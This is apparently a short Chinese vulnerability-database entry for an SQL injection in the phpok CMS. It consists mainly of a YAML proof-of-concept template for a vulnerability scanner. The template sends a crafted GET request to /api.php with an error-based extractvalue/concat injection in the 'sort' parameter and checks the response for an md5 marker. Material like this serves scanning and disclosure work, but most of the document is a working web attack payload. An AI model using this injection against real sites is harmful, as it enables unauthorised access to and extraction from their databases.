phpok-sqli: phpok sqli

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

phpok sqli vulnerability

PoC代码[已公开]

id: phpok-sqli

info:
  name: phpok sqli
  author: jinqi
  severity: high
  description: |-
    phpok sqli vulnerability
  tags: phpok,sqli
  created: 2023/10/13

set:
  r1: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()